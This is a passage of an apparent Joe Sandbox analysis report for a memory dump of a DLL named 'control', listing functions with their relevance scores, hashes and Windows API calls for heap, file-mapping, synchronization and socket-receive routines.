Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateEvent$CountCriticalInfoInitializeNativeSectionSpinSystem
String ID:
API String ID: 2029452385-0
Opcode ID: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
Instruction ID: ef2a892a8e3a634590cf7f156d9bf4d127c5d71b8d2808cd9302d73839e031fd
Opcode Fuzzy Hash: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
Instruction Fuzzy Hash: 4141E6B1610B56ABE314CF69C958786FBF4FB04318F50421AE5189BA90D7BAB468CFC4

Function 10047E9E Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10047ED2
__isleadbyte_l.LIBCMT ref: 10047F00
MultiByteToWideChar.KERNEL32(00000080,00000009,1001BDE2,00000001,?,00000000,00000010,00000000,?,00000010,?,1001BDE2), ref: 10047F2E
MultiByteToWideChar.KERNEL32(00000080,00000009,1001BDE2,00000001,?,00000000,00000010,00000000,?,00000010,?,1001BDE2), ref: 10047F64

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f04d3d578df15ec79b717b8811c2208a8e6eb84513cd13d46aaf3aef71c595e1
Instruction ID: 7b9b075eb3fa09c121e4bd97e4ee65ffc9544b227e5841d369dfb56db6976ebf
Opcode Fuzzy Hash: f04d3d578df15ec79b717b8811c2208a8e6eb84513cd13d46aaf3aef71c595e1
Instruction Fuzzy Hash: 4031CF35600246AFDB22CF35CC44BAA7BE9FF05250F224578E868DB1A0E730EC55DB94

Function 100247C0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?), ref: 10024850
UnmapViewOfFile.KERNEL32(?), ref: 10024878
CloseHandle.KERNEL32(?), ref: 10024892
CloseHandle.KERNEL32(?), ref: 100248AE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle$ErrorFileLastUnmapView
String ID:
API String ID: 4017539725-0
Opcode ID: 3ceb2e20783662c0427984b4396cb28606d968d3780ffe89ea470a14c13c1fc5
Instruction ID: afd46a3e9137c2c7161fb6f95e0b759404fca3bed561303b4318d2103f5cd4c8
Opcode Fuzzy Hash: 3ceb2e20783662c0427984b4396cb28606d968d3780ffe89ea470a14c13c1fc5
Instruction Fuzzy Hash: 48314C756143519FE700CF65D848B6BB7E8EB88B50F81491DF855D7280EF75D8048BA2

Function 10027000 Relevance: 6.1, APIs: 4, Instructions: 89fileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?), ref: 10027090
UnmapViewOfFile.KERNEL32(?), ref: 100270B5
CloseHandle.KERNEL32(?), ref: 100270CF
CloseHandle.KERNEL32(?), ref: 100270EB

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle$ErrorFileLastUnmapView
String ID:
API String ID: 4017539725-0
Opcode ID: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
Instruction ID: 79f660d10e505635d13e7438cecf30ec9b8fed93fcc1d4ef52dd99797ee5355a
Opcode Fuzzy Hash: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
Instruction Fuzzy Hash: 92314D71204351DFD710CF65D884B2BB7E8FB88750F418A1DF855C7280EB75D8088B92

Function 1001ECD0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1001ED4C
_free.LIBCMT ref: 1001EDA0
HeapDestroy.KERNEL32(?), ref: 1001EDD4
HeapDestroy.KERNEL32(?), ref: 1001EDDE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: DestroyHeap_free
String ID:
API String ID: 2273598101-0
Opcode ID: 58df195094a383edf62aa2cb6d664e87594f6f477f4430481b31c9a0d40ee881
Instruction ID: 492fe64dec8016b79279c80015900f38bb75996947eedb7b5902276d798321f9
Opcode Fuzzy Hash: 58df195094a383edf62aa2cb6d664e87594f6f477f4430481b31c9a0d40ee881
Instruction Fuzzy Hash: 703149B1A00B46ABEB15DF64D84878AFBE8FF04744F01462AE4549B680DBB5F918CBD1

Function 10024DD0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 10024E20
InterlockedCompareExchange.KERNEL32(?,?,?), ref: 10024E32

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CompareExchangeInterlocked
String ID:
API String ID: 3335655927-0
Opcode ID: ae4addd928f558fdc1c118c3a60b518e17f7a3611848eb618db682bdd423e2fe
Instruction ID: e1f2d79d789005ecf1d392b526d1b8d44dde72ede6ef427eec4980a95b84b268
Opcode Fuzzy Hash: ae4addd928f558fdc1c118c3a60b518e17f7a3611848eb618db682bdd423e2fe
Instruction Fuzzy Hash: 77216F726046099BD720DF69D980F86F3EDFB49310F42496EE699C7240DA71F9148B60

Function 1001E570 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10020D20: DeleteCriticalSection.KERNEL32(00000018,1005099E,1001E5A8,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DCE
Part of subcall function 10020D20: HeapFree.KERNEL32(?,00000000,00000000,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DD9

_free.LIBCMT ref: 1001E5DD
_free.LIBCMT ref: 1001E631
HeapDestroy.KERNEL32(?), ref: 1001E665
HeapDestroy.KERNEL32(?), ref: 1001E66F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$Destroy_free$CriticalDeleteFreeSection
String ID:
API String ID: 981829196-0
Opcode ID: 54cffe5bcdc0c28fb5e7ac4dfeee152347f5711852f878f0b869f9ce5ac5a81d
Instruction ID: e5d762c26f5f4a4bd1cef0bd03f342e0547f0682f6a331dabc1adc5352ebfb56
Opcode Fuzzy Hash: 54cffe5bcdc0c28fb5e7ac4dfeee152347f5711852f878f0b869f9ce5ac5a81d
Instruction Fuzzy Hash: 78317EB5A00A45ABEB04CF64C848B9AF7E8FF14744F00422AE4589B380DBB5F854CBD1

Function 10024090 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 100240D2
LeaveCriticalSection.KERNEL32(?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 10024107
PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?), ref: 10024133
SetLastError.KERNEL32(00000057,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 1002413A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterErrorLastLeavePostQueuedStatus
String ID:
API String ID: 1216617850-0
Opcode ID: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
Instruction ID: d1afc4b1f62b75d7c0d42d46145dd7902132c798b5be5b94712711f6fd68f30f
Opcode Fuzzy Hash: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
Instruction Fuzzy Hash: F321CF32600255EFDB10CF84DC84B9ABBF8FB44750F528669F9198B290CB759884CB50

Function 1001BC82 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001BC87
LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Local$AllocByteCharFreeH_prologMultiWide
String ID:
API String ID: 1989602771-0
Opcode ID: 06d34933d169b6f4ecb5672093e3b205bf0743133c652062ef2dc2e763a43428
Instruction ID: 922f186abace7c5ffff782b3d96f56d83abaf94767c310c02c30585464adbbac
Opcode Fuzzy Hash: 06d34933d169b6f4ecb5672093e3b205bf0743133c652062ef2dc2e763a43428
Instruction Fuzzy Hash: 22118B75A00605ABEB14DF699C999BFFBB9EB88750B10052DE806AB250CB709E44C6A0

Function 1001ED19 Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1001ED4C
_free.LIBCMT ref: 1001EDA0
HeapDestroy.KERNEL32(?), ref: 1001EDD4
HeapDestroy.KERNEL32(?), ref: 1001EDDE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: DestroyHeap_free
String ID:
API String ID: 2273598101-0
Opcode ID: 05db630e56019362ad307cac461d0e9443326030edad1543d205fc14a9efd1c7
Instruction ID: 5e3d9f0d04deac3397d6fa88b09c8b526b75e743cb1aaf46cffc163cfbb199ef
Opcode Fuzzy Hash: 05db630e56019362ad307cac461d0e9443326030edad1543d205fc14a9efd1c7
Instruction Fuzzy Hash: 6E2139B0A00B46AFEB15CF24D84974AF7E8FF04344F014619E8589B280DB75F924CBD1

Function 100252C0 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(1002594E,00000000,00000000,00000000,1002594E,00000000), ref: 100252D2
CreateFileMappingA.KERNEL32(1002594E,00000000,00000002,00000000,00000000,00000000), ref: 100252E6
MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,?,00000000), ref: 10025329
CloseHandle.KERNEL32(?), ref: 1002533F

Part of subcall function 100252A0: GetLastError.KERNEL32(1002533A), ref: 100252A0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingSizeView
String ID:
API String ID: 322783378-0
Opcode ID: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
Instruction ID: b24b83d2de12238dc06bc647823d72b1e2335c8e7f7e86260e440beeb8542a3f
Opcode Fuzzy Hash: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
Instruction Fuzzy Hash: 4F11A076600616BFE710DF68EC05B69BBB8FB08311F50422AFD01D3680D7B1A9649BE8

Function 100065E5 Relevance: 6.1, APIs: 4, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100065EA
WaitForSingleObject.KERNEL32(?,000000FF,1005ADE8,?,?,?,10007379,?), ref: 10006601
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10006645
ReleaseMutex.KERNEL32(?), ref: 10006677

Part of subcall function 10009910: _memmove.LIBCMT ref: 100099A0
Part of subcall function 10009910: _memmove.LIBCMT ref: 100099CD

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exceptionMutexObjectReleaseSingleWait
String ID:
API String ID: 2263916551-0
Opcode ID: 88ad9244caabe5c007718e5941219926d190531c6a1110f5919371641626691b
Instruction ID: ed82df08a7a227c2f72e4939e7cd68ce9b9c32cd88a7dee2e31fc4f2862304be
Opcode Fuzzy Hash: 88ad9244caabe5c007718e5941219926d190531c6a1110f5919371641626691b
Instruction Fuzzy Hash: 5B216435A00B06AFEB28CF68C885A9AB7F1FF08351F10892DF06A97251CB75B904CB54

Function 100201C0 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 100201F1

Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A

_free.LIBCMT ref: 10020215
HeapDestroy.KERNEL32(?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 10020243
HeapCreate.KERNEL32(?,?,?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 10020252

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
String ID:
API String ID: 3571060031-0
Opcode ID: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
Instruction ID: 0a878298919a2728ada9c9bda282240638a9b5f958c97604bce3e13ab8e5967f
Opcode Fuzzy Hash: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
Instruction Fuzzy Hash: 901106B520070AEBD704CFA5D884B9AFBB9FF08344F50421AE90897651EB71F924CBA0

Function 1001B503 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1001B524
_free.LIBCMT ref: 1001B553
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,1001B3A2,?,000001C8), ref: 1001B573
HeapFree.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B57A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap_free$FreeProcess
String ID:
API String ID: 1072109031-0
Opcode ID: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
Instruction ID: 91e55399d9fdf6679953e435a265fa2e3a507e988a5e8b74e9227a28433c2d31
Opcode Fuzzy Hash: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
Instruction Fuzzy Hash: F0113532400F11EFDB619F65DD85A27BBEAFF04756705992EE19A4A921CB32F890CB00

Function 10026800 Relevance: 6.1, APIs: 4, Instructions: 55networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,00000000), ref: 1002681B
SetLastError.KERNEL32(00000000), ref: 10026825
GetLastError.KERNEL32 ref: 1002683E
WSAGetLastError.WS2_32 ref: 10026885

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: 908c792c3ed5b7cdadd5aad8e154ba28a449dc5bb33e0553786ecd67720522c2
Instruction ID: f7e84451568a44ed458b9d5d2244c37d3f724e84309491f0b5f5bdd03eda6683
Opcode Fuzzy Hash: 908c792c3ed5b7cdadd5aad8e154ba28a449dc5bb33e0553786ecd67720522c2
Instruction Fuzzy Hash: 61118472100B119FD3308F69DC88747B7E5FF88321F508E2EE55AC26A0DBB5E8559B40

Function 1001FFD0 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,00000000,000002FB,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020000

Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A

_free.LIBCMT ref: 10020024
HeapDestroy.KERNEL32(?,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020052
HeapCreate.KERNEL32(?,?,?,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020061

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
String ID:
API String ID: 3571060031-0
Opcode ID: 84ded86f95d57296fbd30c1761500bbdf8cef904f112831623cba76fd1813d80
Instruction ID: b9c6984a8774ec933c58018bea8c4d1d370adf3d32408ad4e709cfd0ada2d52a
Opcode Fuzzy Hash: 84ded86f95d57296fbd30c1761500bbdf8cef904f112831623cba76fd1813d80
Instruction Fuzzy Hash: 2C111CB520070AFBE704CF65D894B96F7B9FF09340F504219E90897691EB71F924DB90

Function 10025220 Relevance: 6.1, APIs: 4, Instructions: 51threadsleepCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10025230
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 10025242
